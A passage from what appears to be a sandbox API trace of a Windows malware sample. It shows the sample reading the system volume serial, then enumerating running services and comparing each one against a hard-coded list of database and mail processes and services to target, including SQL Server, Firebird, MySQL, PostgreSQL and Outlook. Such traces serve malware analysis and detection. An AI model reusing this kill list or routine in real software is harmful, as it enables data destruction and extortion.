dwFlags=0x0, lpMem=0x615fd0 | out: hHeap=0x5d0000) returned 1 [0043.314] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x65c2c8, Size=0x20) returned 0x60e7f0 [0043.314] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%", lpDst=0x64af78, nSize=0x7fff | out: lpDst="C:") returned 0x3 [0043.314] lstrlenW (lpString="C:\\") returned 3 [0043.315] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x19fca4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x19fca4*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0043.315] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x64af78 | out: hHeap=0x5d0000) returned 1 [0043.315] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x65d180, Size=0x82) returned 0x616060 [0043.315] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x65d0c0, Size=0x100) returned 0x6160f0 [0043.315] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x616060, Size=0x104) returned 0x616318 [0043.316] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x6160f0, Size=0x200) returned 0x629728 [0043.317] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x65d050 | out: hHeap=0x5d0000) returned 1 [0043.317] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x629728 | out: hHeap=0x5d0000) returned 1 [0043.317] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x65c370 | out: hHeap=0x5d0000) returned 1 [0043.317] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x6145a0 | out: hHeap=0x5d0000) returned 1 [0043.317] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x65c400 | out: hHeap=0x5d0000) returned 1 [0043.317] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x614d98 | out: hHeap=0x5d0000) returned 1 [0043.317] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x65c568 | out: hHeap=0x5d0000) returned 1 [0043.317] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x616318 | out: hHeap=0x5d0000) returned 1 [0043.317] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x65c538 | out: hHeap=0x5d0000) returned 1 [0043.317] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x6161f8 | out: hHeap=0x5d0000) returned 1 [0043.317] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x65c418 | out: hHeap=0x5d0000) returned 1 [0043.317] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x616288 | out: hHeap=0x5d0000) returned 1 [0043.317] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x65c430 | out: hHeap=0x5d0000) returned 1 [0043.317] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x65c3e8, Size=0x20) returned 0x60ec00 [0043.317] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x60ec00, Size=0x40) returned 0x5ea390 [0043.317] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x65d110 | out: hHeap=0x5d0000) returned 1 [0043.317] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x65c508 | out: hHeap=0x5d0000) returned 1 [0043.317] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x615fd0 | out: hHeap=0x5d0000) returned 1 [0043.317] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x65c4a8 | out: hHeap=0x5d0000) returned 1 [0043.317] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x614b78 | out: hHeap=0x5d0000) returned 1 [0043.317] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x65c2c8 | out: hHeap=0x5d0000) returned 1 [0043.317] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x65d0f0 | out: hHeap=0x5d0000) returned 1 [0043.317] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x65c358 | out: hHeap=0x5d0000) returned 1 [0043.317] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5e6228 | out: hHeap=0x5d0000) returned 1 [0043.317] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5e5550 | out: hHeap=0x5d0000) returned 1 [0043.317] lstrlenW (lpString="%systemdrive%") returned 13 [0043.317] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x60e7f0 | out: hHeap=0x5d0000) returned 1 [0043.317] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x614848 | out: hHeap=0x5d0000) returned 1 [0043.317] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x65d070 | out: hHeap=0x5d0000) returned 1 [0043.318] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4091f0, lpParameter=0x63af58, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x270 [0043.319] WaitForMultipleObjects (nCount=0x2, lpHandles=0x5eabf8*=0x260, bWaitAll=1, dwMilliseconds=0xffffffff) Thread: id = 2 os_tid = 0xdb8 Thread: id = 4 os_tid = 0xf78 [0043.352] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x65c538 [0043.352] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x65c538, Size=0x20) returned 0x60e908 [0043.352] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x60e908, Size=0x40) returned 0x5ea198 [0043.352] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5ea198, Size=0x80) returned 0x6149e0 [0043.352] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x6149e0, Size=0x100) returned 0x6161e0 [0043.352] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x65c400 [0043.352] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x65c400, Size=0x20) returned 0x60ec00 [0043.352] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x60ec00, Size=0x40) returned 0x5e9fa0 [0043.352] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5e9fa0, Size=0x80) returned 0x614d98 [0043.352] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x614d98, Size=0x100) returned 0x6162e8 [0043.352] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xc) returned 0x65c538 [0043.352] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x4) returned 0x65d050 [0043.352] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x65c400 [0043.352] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x65d050, Size=0x8) returned 0x65d160 [0043.352] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x14) returned 0x5e57f0 [0043.352] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x65d160, Size=0x10) returned 0x65c568 [0043.352] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x18) returned 0x5e55d0 [0043.352] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x1a) returned 0x60e7f0 [0043.352] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x65c568, Size=0x20) returned 0x60e840 [0043.352] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x1c) returned 0x60e890 [0043.352] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x16) returned 0x5e5630 [0043.352] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x1a) returned 0x60e9f8 [0043.352] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xc) returned 0x65c418 [0043.352] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x4) returned 0x65d110 [0043.353] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x40) returned 0x5ea420 [0043.353] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x65d110, Size=0x8) returned 0x65d1a0 [0043.353] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x3c) returned 0x5ea270 [0043.353] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x65d1a0, Size=0x10) returned 0x65c358 [0043.353] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x14) returned 0x5e5730 [0043.353] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x18) returned 0x5e5770 [0043.353] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x65c358, Size=0x20) returned 0x60e908 [0043.353] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x24) returned 0x5e6138 [0043.353] lstrlenW (lpString="1c8.exe;1cv77.exe;outlook.exe;postgres.exe;mysqld-nt.exe;mysqld.exe;sqlservr.exe;") returned 81 [0043.353] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x6161e0 | out: hHeap=0x5d0000) returned 1 [0043.353] lstrlenW (lpString="FirebirdGuardianDefaultInstance;FirebirdServerDefaultInstance;sqlwriter;mssqlserver;sqlserveradhelper;") returned 102 [0043.353] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x6162e8 | out: hHeap=0x5d0000) returned 1 [0043.353] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x60eb10 [0043.353] EnumServicesStatusExW (in: hSCManager=0x60eb10, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x258ff3c, lpServicesReturned=0x258ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x258ff3c, lpServicesReturned=0x258ff54, lpResumeHandle=0x0) returned 0 [0043.354] GetLastError () returned 0xea [0043.354] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x1c8a) returned 0x62d420 [0043.354] EnumServicesStatusExW (in: hSCManager=0x60eb10, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x62d420, cbBufSize=0x1c8a, pcbBytesNeeded=0x258ff3c, lpServicesReturned=0x258ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x62d420, pcbBytesNeeded=0x258ff3c, lpServicesReturned=0x258ff54, lpResumeHandle=0x0) returned 1 [0043.354] CloseServiceHandle (hSCObject=0x60eb10) returned 1 [0043.355] lstrlenW (lpString="Appinfo") returned 7 [0043.355] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0043.355] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0043.355] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0043.355] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0043.355] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0043.355] lstrlenW (lpString="AppXSvc") returned 7 [0043.355] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0043.355] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0043.355] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0043.355] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0043.355] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0043.355] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0043.355] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0043.355] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0043.355] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0043.355] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0043.355] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0043.355] lstrlenW (lpString="Audiosrv") returned 8 [0043.355] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0043.355] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0043.355] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0043.355] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0043.355] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0043.355] lstrlenW (lpString="BFE") returned 3 [0043.355] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0043.355] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0043.355] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0043.355] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0043.355] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0043.355] lstrlenW (lpString="BITS") returned 4 [0043.356] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BITS") returned 1 [0043.356] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BITS") returned 1 [0043.356] lstrcmpiW (lpString1="sqlwriter", lpString2="BITS") returned 1 [0043.356] lstrcmpiW (lpString1="mssqlserver", lpString2="BITS") returned 1 [0043.356] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BITS") returned 1 [0043.356] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0043.356] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0043.356] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0043.356] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0043.356] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0043.356] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0043.356] lstrlenW (lpString="CDPSvc") returned 6 [0043.356] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0043.356] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0043.356] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0043.356] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0043.356] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0043.356] lstrlenW (lpString="ClickToRunSvc") returned 13 [0043.356] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0043.356] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0043.356] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0043.356] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0043.356] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0043.356] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0043.356] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0043.356] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0043.356] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0043.356] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0043.356] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0043.356] lstrlenW (lpString="CryptSvc") returned 8 [0043.356] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0043.356] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0043.356] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0043.356] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0043.356] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0043.356] lstrlenW (lpString="DcomLaunch") returned 10 [0043.356] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0043.357] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0043.357] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0043.357] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0043.357] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0043.357] lstrlenW (lpString="DeviceAssociationService") returned 24 [0043.357] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0043.357] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0043.357] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0043.357] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0043.357] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0043.357] lstrlenW (lpString="Dhcp") returned 4 [0043.357] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0043.357] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0043.357] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0043.357] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0043.357] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0043.357] lstrlenW (lpString="Dnscache") returned 8 [0043.357] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0043.357] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0043.357] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0043.357] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0043.357] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0043.357] lstrlenW (lpString="DPS") returned 3 [0043.357] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0043.357] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0043.357] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0043.357] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0043.357] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0043.357] lstrlenW (lpString="DusmSvc") returned 7 [0043.357] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0043.357] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0043.357] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0043.357] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0043.358] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0043.358] lstrlenW (lpString="EventLog") returned 8 [0043.358] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0043.358] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0043.358] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0043.358] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0043.358] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0043.358] lstrlenW (lpString="EventSystem") returned 11 [0043.358] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0043.358] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0043.358] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0043.358] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0043.358] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0043.358] lstrlenW (lpString="FontCache") returned 9 [0043.358] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0043.358] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0043.358] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0043.358] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0043.358] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0043.358] lstrlenW (lpString="gpsvc") returned 5 [0043.358] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0043.358] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0043.358] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0043.358] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0043.358] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0043.358] lstrlenW (lpString="iphlpsvc") returned 8 [0043.358] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0043.358] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0043.358] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0043.358] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0043.358] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0043.358] lstrlenW (lpString="KeyIso") returned 6 [0043.358] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0043.358] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0043.358] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0043.358] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0043.358] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0043.359] lstrlenW (lpString="LanmanServer") returned 12 [0043.359] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0043.359] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0043.359] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0043.359] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0043.359] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0043.359] lstrlenW (lpString="LanmanWorkstation") returned 17 [0043.359] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0043.359] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0043.359] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0043.359] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0043.359] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0043.359] lstrlenW (lpString="lfsvc") returned 5 [0043.359] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0043.359] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0043.359] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0043.359] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0043.359] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0043.359] lstrlenW (lpString="lmhosts") returned 7 [0043.359] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0043.359] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0043.359] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0043.359] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0043.359] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0043.359] lstrlenW (lpString="LSM") returned 3 [0043.359] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0043.359] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0043.359] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0043.359] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0043.359] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0043.359] lstrlenW (lpString="MpsSvc") returned 6 [0043.359] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0043.359] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0043.360] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0043.360] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0043.360] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0043.360] lstrlenW (lpString="NcbService") returned 10 [0043.360] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0043.360] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0043.360] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0043.360] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0043.360] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0043.360] lstrlenW (lpString="netprofm") returned 8 [0043.360] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0043.360] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0043.360] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0043.360] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0043.360] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0043.360] lstrlenW (lpString="NgcSvc") returned 6 [0043.360] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NgcSvc") returned -1 [0043.360] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NgcSvc") returned -1 [0043.360] lstrcmpiW (lpString1="sqlwriter", lpString2="NgcSvc") returned 1 [0043.360] lstrcmpiW (lpString1="mssqlserver", lpString2="NgcSvc") returned -1 [0043.360] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NgcSvc") returned 1 [0043.360] lstrlenW (lpString="NlaSvc") returned 6 [0043.360] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0043.360] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0043.360] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0043.360] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0043.360] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0043.360] lstrlenW (lpString="nsi") returned 3 [0043.360] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0043.360] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0043.360] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0043.360] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0043.360] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0043.360] lstrlenW (lpString="PcaSvc") returned 6 [0043.360] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0043.360] lstrcmpiW 